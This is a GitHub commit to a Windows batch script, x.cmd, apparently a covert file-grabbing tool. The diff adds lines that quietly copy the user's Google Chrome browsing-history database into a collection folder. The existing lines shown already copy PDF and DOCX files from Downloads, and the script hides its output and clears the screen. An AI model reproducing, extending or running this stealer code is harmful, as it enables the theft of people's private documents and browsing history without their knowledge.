Update x.cmd (#536)

If google chrome is installed, download the history.
This commit is contained in:
Ferrari 2022-07-14 16:22:18 -03:00 committed by GitHub
parent 8185b97046
commit cae94215c7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -33,5 +33,9 @@ xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
)
if Exist %USERPROFILE%\AppData\Local\Google\Chrome\ (
xcopy /C /Q /G /Y "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History" %dst% >>nul
)
@cls
@exit